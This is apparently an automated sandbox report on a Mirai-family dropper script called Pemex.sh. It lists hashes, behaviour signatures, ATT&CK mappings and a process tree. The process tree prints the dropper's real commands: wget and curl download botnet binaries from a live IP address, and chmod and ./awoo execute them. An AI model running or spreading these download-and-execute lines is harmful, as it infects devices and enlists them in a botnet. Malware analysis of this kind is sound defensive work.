Analysis
  max time kernel: 114s
  max time network: 160s
  platform: debian-9_armhf
  resource: debian9-armhf-20240611-en
  resource tags: arch:armhf, image:debian9-armhf-20240611-en, kernel:4.9.0-13-armmp-lpae, locale:en-us, os:debian-9-armhf, system
  submitted: 23-12-2024 06:19
Static task: static1
Behavioral task: behavioral1 (Sample: Pemex.sh, Resource: ubuntu1804-amd64-20240508-en)
Behavioral task: behavioral2 (Sample: Pemex.sh, Resource: debian9-armhf-20240611-en)
Behavioral task: behavioral3 (Sample: Pemex.sh, Resource: debian9-mipsbe-20240611-en)
Behavioral task: behavioral4 (Sample: Pemex.sh, Resource: debian9-mipsel-20240418-en)
General
  Target: Pemex.sh
  Size: 1KB
  MD5: e18ba04d72384ac85e6117c774f6d4f9
  SHA1: 6cb8e9a2da2db042da0875a08f43cc867b8a2c5b
  SHA256: 289876bf62e9a2a364da63cceb9a865c84792377a700afb676811ee53113919e
  SHA512: 3e69c0fdb07347f2dcd8d3b3d9514d392a572173afec60fd702180cf3f7d5d21bca67dff2cb022641c7f0a2df4b817f1589a6a1599726ddeea67ba5c768e954d
Malware Config
  Extracted: mirai (LZRD)
  Extracted: mirai (LZRD)
  Extracted: mirai (LZRD)
Signatures

Mirai family

Contacts a large number (63573) of remote hosts  (1 TTPs)
  This may indicate a network scan to discover remotely running services.

Creates a large amount of network flows  (1 TTPs)
  This may indicate a network scan to discover remotely running services.

File and Directory Permissions Modification  (1 TTPs, 10 IoCs)
  Adversaries may modify file or directory permissions to evade defenses.
  pid   Process
  793   chmod
  799   chmod
  823   chmod
  836   chmod
  852   chmod
  715   chmod
  780   chmod
  804   chmod
  755   chmod
  786   chmod

Executes dropped EXE  (10 IoCs)
  ioc         pid   Process
  /tmp/awoo   716   awoo
  /tmp/awoo   757   awoo
  /tmp/awoo   781   awoo
  /tmp/awoo   787   awoo
  /tmp/awoo   794   awoo
  /tmp/awoo   800   awoo
  /tmp/awoo   805   awoo
  /tmp/awoo   824   awoo
  /tmp/awoo   837   awoo
  /tmp/awoo   853   awoo

Modifies Watchdog functionality  (1 TTPs, 8 IoCs)
  Malware like Mirai modifies the watchdog to prevent it from restarting an infected system.
  description                    ioc                  Process
  File opened for modification   /dev/watchdog        awoo
  File opened for modification   /dev/misc/watchdog   awoo
  File opened for modification   /dev/watchdog        awoo
  File opened for modification   /dev/misc/watchdog   awoo
  File opened for modification   /dev/watchdog        awoo
  File opened for modification   /dev/misc/watchdog   awoo
  File opened for modification   /dev/watchdog        awoo
  File opened for modification   /dev/misc/watchdog   awoo

Enumerates active TCP sockets  (1 TTPs, 4 IoCs)
  Gets active TCP sockets from the /proc virtual filesystem.
  description               ioc             Process
  File opened for reading   /proc/net/tcp   awoo
  File opened for reading   /proc/net/tcp   awoo
  File opened for reading   /proc/net/tcp   awoo
  File opened for reading   /proc/net/tcp   awoo

Enumerates running processes
  Discovers information about currently running processes on the system.

Checks CPU configuration  (1 TTPs, 10 IoCs)
  Checks CPU information that can indicate whether the system is a virtual machine.
  description               ioc             Process
  File opened for reading   /proc/cpuinfo   curl
  File opened for reading   /proc/cpuinfo   curl
  File opened for reading   /proc/cpuinfo   curl
  File opened for reading   /proc/cpuinfo   curl
  File opened for reading   /proc/cpuinfo   curl
  File opened for reading   /proc/cpuinfo   curl
  File opened for reading   /proc/cpuinfo   curl
  File opened for reading   /proc/cpuinfo   curl
  File opened for reading   /proc/cpuinfo   curl
  File opened for reading   /proc/cpuinfo   curl

Reads system network configuration  (1 TTPs, 4 IoCs)
  Uses the contents of the /proc filesystem to enumerate network settings.
  description               ioc             Process
  File opened for reading   /proc/net/tcp   awoo
  File opened for reading   /proc/net/tcp   awoo
  File opened for reading   /proc/net/tcp   awoo
  File opened for reading   /proc/net/tcp   awoo
Reads runtime system information
  description               ioc                             Process
  File opened for reading   /proc/844/fd                    awoo
  File opened for reading   /proc/328/fd                    awoo
  File opened for reading   /proc/660/fd                    awoo
  File opened for reading   /proc/sys/crypto/fips_enabled   curl
  File opened for reading   /proc/598/fd                    awoo
  File opened for reading   /proc/606/fd                    awoo
  File opened for reading   /proc/280/fd                    awoo
  File opened for reading   /proc/295/fd                    awoo
  File opened for reading   /proc/self/auxv                 curl
  File opened for reading   /proc/841/fd                    awoo
  File opened for reading   /proc/143/fd                    awoo
  File opened for reading   /proc/598/fd                    awoo
  File opened for reading   /proc/660/fd                    awoo
  File opened for reading   /proc/601/fd                    awoo
  File opened for reading   /proc/831/fd                    awoo
  File opened for reading   /proc/self/auxv                 curl
  File opened for reading   /proc/316/fd                    awoo
  File opened for reading   /proc/sys/crypto/fips_enabled   curl
  File opened for reading   /proc/608/fd                    awoo
  File opened for reading   /proc/842/fd                    awoo
  File opened for reading   /proc/281/fd                    awoo
  File opened for reading   /proc/143/fd                    awoo
  File opened for reading   /proc/280/fd                    awoo
  File opened for reading   /proc/sys/crypto/fips_enabled   curl
  File opened for reading   /proc/283/fd                    awoo
  File opened for reading   /proc/840/fd                    awoo
  File opened for reading   /proc/280/fd                    awoo
  File opened for reading   /proc/316/fd                    awoo
  File opened for reading   /proc/281/fd                    awoo
  File opened for reading   /proc/663/fd                    awoo
  File opened for reading   /proc/808/fd                    awoo
  File opened for reading   /proc/838/fd                    awoo
  File opened for reading   /proc/857/exe                   awoo
  File opened for reading   /proc/283/fd                    awoo
  File opened for reading   /proc/603/fd                    awoo
  File opened for reading   /proc/663/fd                    awoo
  File opened for reading   /proc/1/fd                      awoo
  File opened for reading   /proc/850/fd                    awoo
  File opened for reading   /proc/865/exe                   awoo
  File opened for reading   /proc/869/exe                   awoo
  File opened for reading   /proc/796/fd                    awoo
  File opened for reading   /proc/663/fd                    awoo
  File opened for reading   /proc/827/fd                    awoo
  File opened for reading   /proc/867/exe                   awoo
  File opened for reading   /proc/829/fd                    awoo
  File opened for reading   /proc/827/fd                    awoo
  File opened for reading   /proc/809/fd                    awoo
  File opened for reading   /proc/806/fd                    awoo
  File opened for reading   /proc/847/fd                    awoo
  File opened for reading   /proc/1/fd                      awoo
  File opened for reading   /proc/854/fd                    awoo
  File opened for reading   /proc/810/fd                    awoo
  File opened for reading   /proc/283/fd                    awoo
  File opened for reading   /proc/796/fd                    awoo
  File opened for reading   /proc/827/fd                    awoo
  File opened for reading   /proc/663/exe                   awoo
  File opened for reading   /proc/self/auxv                 curl
  File opened for reading   /proc/808/fd                    awoo
  File opened for reading   /proc/829/fd                    awoo
  File opened for reading   /proc/606/exe                   awoo
  File opened for reading   /proc/sys/crypto/fips_enabled   curl
  File opened for reading   /proc/295/fd                    awoo
  File opened for reading   /proc/281/fd                    awoo
  File opened for reading   /proc/601/fd                    awoo
System Network Configuration Discovery  (1 TTPs, 3 IoCs)
  Adversaries may gather information about the network configuration of a system.
  pid   Process
  718   wget
  735   curl
  754   cat

Writes file to tmp directory  (20 IoCs)
  Malware often drops required files in the /tmp directory.
  description                    ioc                  Process
  File opened for modification   /tmp/loligang.arm5   curl
  File opened for modification   /tmp/loligang.x86    wget
  File opened for modification   /tmp/loligang.mpsl   curl
  File opened for modification   /tmp/loligang.arm5   wget
  File opened for modification   /tmp/loligang.arm6   wget
  File opened for modification   /tmp/loligang.arm6   curl
  File opened for modification   /tmp/loligang.sh4    curl
  File opened for modification   /tmp/loligang.mips   wget
  File opened for modification   /tmp/loligang.mips   curl
  File opened for modification   /tmp/loligang.arm7   curl
  File opened for modification   /tmp/loligang.ppc    curl
  File opened for modification   /tmp/loligang.m68k   wget
  File opened for modification   /tmp/loligang.m68k   curl
  File opened for modification   /tmp/loligang.x86    curl
  File opened for modification   /tmp/awoo            Pemex.sh
  File opened for modification   /tmp/loligang.mpsl   wget
  File opened for modification   /tmp/loligang.arm4   curl
  File opened for modification   /tmp/loligang.arm7   wget
  File opened for modification   /tmp/loligang.ppc    wget
  File opened for modification   /tmp/loligang.sh4    wget
Processes

/tmp/Pemex.sh
  command: /tmp/Pemex.sh
  signatures: Writes file to tmp directory
  PID: 660

  Child processes of PID 660:

  /usr/bin/wget
    command: wget http://185.255.120.43/lmaoWTF/loligang.x86
    signatures: Writes file to tmp directory
    PID: 662

  /usr/bin/curl
    command: curl -O http://185.255.120.43/lmaoWTF/loligang.x86
    signatures: Checks CPU configuration; Writes file to tmp directory
    PID: 697

  /bin/cat
    command: cat loligang.x86
    PID: 713

  /bin/chmod
    command: chmod +x awoo loligang.x86 Pemex.sh systemd-private-8d7ee401a9394427ac9c349829b4f8d7-systemd-timedated.service-3ZBytL
    signatures: File and Directory Permissions Modification
    PID: 715

  /tmp/awoo
    command: ./awoo
    signatures: Executes dropped EXE
    PID: 716

  /usr/bin/wget
    command: wget http://185.255.120.43/lmaoWTF/loligang.mips
    signatures: System Network Configuration Discovery; Writes file to tmp directory
    PID: 718

  /usr/bin/curl
    command: curl -O http://185.255.120.43/lmaoWTF/loligang.mips
    signatures: Checks CPU configuration; Reads runtime system information; System Network Configuration Discovery; Writes file to tmp directory
    PID: 735

  /bin/cat
    command: cat loligang.mips
    signatures: System Network Configuration Discovery
    PID: 754

  /bin/chmod
    command: chmod +x awoo loligang.mips loligang.x86 Pemex.sh systemd-private-8d7ee401a9394427ac9c349829b4f8d7-systemd-timedated.service-3ZBytL
    signatures: File and Directory Permissions Modification
    PID: 755

  /tmp/awoo
    command: ./awoo
    signatures: Executes dropped EXE
    PID: 757

  /usr/bin/wget
    command: wget http://185.255.120.43/lmaoWTF/loligang.mpsl
    signatures: Writes file to tmp directory
    PID: 759

  /usr/bin/curl
    command: curl -O http://185.255.120.43/lmaoWTF/loligang.mpsl
    signatures: Checks CPU configuration; Writes file to tmp directory
    PID: 778

  /bin/cat
    command: cat loligang.mpsl
    PID: 779

  /bin/chmod
    command: chmod +x awoo loligang.mips loligang.mpsl loligang.x86 Pemex.sh systemd-private-8d7ee401a9394427ac9c349829b4f8d7-systemd-timedated.service-3ZBytL
    signatures: File and Directory Permissions Modification
    PID: 780

  /tmp/awoo
    command: ./awoo
    signatures: Executes dropped EXE
    PID: 781

  /usr/bin/wget
    command: wget http://185.255.120.43/lmaoWTF/loligang.arm4
    PID: 783

  /usr/bin/curl
    command: curl -O http://185.255.120.43/lmaoWTF/loligang.arm4
    signatures: Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
    PID: 784

  /bin/cat
    command: cat loligang.arm4
    PID: 785

  /bin/chmod
    command: chmod +x awoo loligang.arm4 loligang.mips loligang.mpsl loligang.x86 Pemex.sh systemd-private-8d7ee401a9394427ac9c349829b4f8d7-systemd-timedated.service-3ZBytL
    signatures: File and Directory Permissions Modification
    PID: 786

  /tmp/awoo
    command: ./awoo
    signatures: Executes dropped EXE
    PID: 787

  /usr/bin/wget
    command: wget http://185.255.120.43/lmaoWTF/loligang.arm5
    signatures: Writes file to tmp directory
    PID: 788

  /usr/bin/curl
    command: curl -O http://185.255.120.43/lmaoWTF/loligang.arm5
    signatures: Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
    PID: 789

  /bin/cat
    command: cat loligang.arm5
    PID: 792

  /bin/chmod
    command: chmod +x awoo loligang.arm4 loligang.arm5 loligang.mips loligang.mpsl loligang.x86 Pemex.sh systemd-private-8d7ee401a9394427ac9c349829b4f8d7-systemd-timedated.service-3ZBytL
    signatures: File and Directory Permissions Modification
    PID: 793

  /tmp/awoo
    command: ./awoo
    signatures: Executes dropped EXE
    PID: 794

  /usr/bin/wget
    command: wget http://185.255.120.43/lmaoWTF/loligang.arm6
    signatures: Writes file to tmp directory
    PID: 795

  /usr/bin/curl
    command: curl -O http://185.255.120.43/lmaoWTF/loligang.arm6
    signatures: Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
    PID: 797

  /bin/cat
    command: cat loligang.arm6
    PID: 798

  /bin/chmod
    command: chmod +x awoo loligang.arm4 loligang.arm5 loligang.arm6 loligang.mips loligang.mpsl loligang.x86 Pemex.sh systemd-private-8d7ee401a9394427ac9c349829b4f8d7-systemd-timedated.service-3ZBytL
    signatures: File and Directory Permissions Modification
    PID: 799

  /tmp/awoo
    command: ./awoo
    signatures: Executes dropped EXE
    PID: 800

  /usr/bin/wget
    command: wget http://185.255.120.43/lmaoWTF/loligang.arm7
    signatures: Writes file to tmp directory
    PID: 801

  /usr/bin/curl
    command: curl -O http://185.255.120.43/lmaoWTF/loligang.arm7
    signatures: Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
    PID: 802

  /bin/cat
    command: cat loligang.arm7
    PID: 803

  /bin/chmod
    command: chmod +x awoo loligang.arm4 loligang.arm5 loligang.arm6 loligang.arm7 loligang.mips loligang.mpsl loligang.x86 Pemex.sh systemd-private-8d7ee401a9394427ac9c349829b4f8d7-systemd-timedated.service-3ZBytL
    signatures: File and Directory Permissions Modification
    PID: 804

  /tmp/awoo
    command: ./awoo
    signatures: Executes dropped EXE; Modifies Watchdog functionality; Enumerates active TCP sockets; Reads system network configuration; Reads runtime system information
    PID: 805

  /usr/bin/wget
    command: wget http://185.255.120.43/lmaoWTF/loligang.ppc
    signatures: Writes file to tmp directory
    PID: 809

  /usr/bin/curl
    command: curl -O http://185.255.120.43/lmaoWTF/loligang.ppc
    signatures: Checks CPU configuration; Writes file to tmp directory
    PID: 821

  /bin/chmod
    command: chmod +x awoo loligang.arm4 loligang.arm5 loligang.arm6 loligang.arm7 loligang.mips loligang.mpsl loligang.ppc loligang.x86 Pemex.sh
    signatures: File and Directory Permissions Modification
    PID: 823

  /tmp/awoo
    command: ./awoo
    signatures: Executes dropped EXE; Modifies Watchdog functionality; Enumerates active TCP sockets; Reads system network configuration; Reads runtime system information
    PID: 824

  /usr/bin/wget
    command: wget http://185.255.120.43/lmaoWTF/loligang.m68k
    signatures: Writes file to tmp directory
    PID: 828

  /usr/bin/curl
    command: curl -O http://185.255.120.43/lmaoWTF/loligang.m68k
    signatures: Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
    PID: 832

  /bin/chmod
    command: chmod +x awoo loligang.arm4 loligang.arm5 loligang.arm6 loligang.arm7 loligang.m68k loligang.mips loligang.mpsl loligang.ppc loligang.x86 Pemex.sh
    signatures: File and Directory Permissions Modification
    PID: 836

  /tmp/awoo
    command: ./awoo
    signatures: Executes dropped EXE; Modifies Watchdog functionality; Enumerates active TCP sockets; Reads system network configuration; Reads runtime system information
    PID: 837

  /usr/bin/wget
    command: wget http://185.255.120.43/lmaoWTF/loligang.sh4
    signatures: Writes file to tmp directory
    PID: 841

  /usr/bin/curl
    command: curl -O http://185.255.120.43/lmaoWTF/loligang.sh4
    signatures: Checks CPU configuration; Writes file to tmp directory
    PID: 848

  /bin/chmod
    command: chmod +x awoo loligang.arm4 loligang.arm5 loligang.arm6 loligang.arm7 loligang.m68k loligang.mips loligang.mpsl loligang.ppc loligang.sh4 loligang.x86 Pemex.sh
    signatures: File and Directory Permissions Modification
    PID: 852

  /tmp/awoo
    command: ./awoo
    signatures: Executes dropped EXE; Modifies Watchdog functionality; Enumerates active TCP sockets; Reads system network configuration; Reads runtime system information
    PID: 853
MITRE ATT&CK Enterprise v15
  Defense Evasion
    File and Directory Permissions Modification (1)
      Linux and Mac File and Directory Permissions Modification (1)
    Impair Defenses (1)
    Virtualization/Sandbox Evasion (1)
      System Checks (1)
Downloads

Filesize: 87KB
  MD5: 5f6d2539a443501c888fc90986479ee6
  SHA1: 1f1ce02f9cafc0e684559cd7e36170d6cba370dc
  SHA256: 5775d9b48bb5c73f8e4625ee86f07e33967aecca610947654e8eea692e200137
  SHA512: 3bd781322c46687a8d750c1129b843a2a2312b186094d5918d5d8eac8c0b04ef8ee14a6a14fb74eb557bdb6558f78301a597ee651c4ace2aa23ebe02554a7198

Filesize: 89KB
  MD5: 9a397c973a66d7380ca64d61070b88d3
  SHA1: f6828d001883357d22adf948b087ca400c5498dc
  SHA256: 67b7d4c356522d870024d4f04289dc6bcc53537209478fe43347511abb7e63fc
  SHA512: 18c4d902787043acdc63b3640f6e405dc8f96be38fbd40664595b1c6224adddcfc7895a20417a0de140c8280dc117f3dc7e9bcbb9336b8f0eabfb9f44d7adb77

Filesize: 219B
  MD5: 77a1be2e52dbcd8c91339552d24d4307
  SHA1: 3022d244329aed127e19ee0d417fda68f2dd3e67
  SHA256: 4ccd015d16ad27e624cd00f668f50f22cc0657a51a32cbb852bc9b0f0d09c583
  SHA512: a697f281321f8fdbaee9a2e41867a233bad3c36c9fd16d7bf026736bd97c5139f19bc44283780b957985045a2aeeaca177c5cd2d8e534466eec80c255d31d9b8

Filesize: 61KB
  MD5: 9ead78d6b3492afbfd8e8336b18046d7
  SHA1: 0b53894dd4eaed898736ab347b64f0de63b47f9d
  SHA256: 5b8818d5ed45664d91b526b1b6ad29b24f3f9af48d9c8e4c49f44fcc12daa6ea
  SHA512: 48ba085c4920ed0d4b2512e1f6d6b5faaf6bce09f67da8db89bbb112fb6f7e94908ea5ca91e61237e546ac0864a26a65d3b302cd3894538c2be0f4af5ecae83a

Filesize: 141KB
  MD5: abde533a1866fb17c76ff1edcf5facd1
  SHA1: 21bd062bb8d518f384ed18ca0f2cef91cffbb5f8
  SHA256: ce83c30530762a5dc8832ea605a05d7c411c33d63465ce96cc37b7ef02d4223b
  SHA512: d55f6adfa3dd8b543ed972d6562c8f20cbcb0772f3b7dbc125f2dab9183c92f00feee991f75d85d33add31429f077c64e0d87bda4ab4ef18f159e7e6b116dfec

Filesize: 64KB
  MD5: 2354f2531c0bf296738fa7733c42785f
  SHA1: 86508e4ee74c70bf226f6666bf227a12be69dcad
  SHA256: 3d0b5252c0f8736759af8b122612395ea484794afbdeb5435769f3c164d04c93
  SHA512: eda30463d2e8355af4d6626815aedb78b1b5d43c4df53e4a9a72405074a22e9fd09f54e882b0c5ad5136202907a7e6e599d29d325d6e0b3188e6f8ff77abe679